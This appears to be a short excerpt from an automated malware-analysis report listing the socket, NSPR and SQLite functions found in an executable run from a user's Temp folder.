Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC66070 PR_Listen, 2_2_6BC66070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC6C030 sqlite3_bind_parameter_count, 2_2_6BC6C030
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC66410 bind,WSAGetLastError, 2_2_6BC66410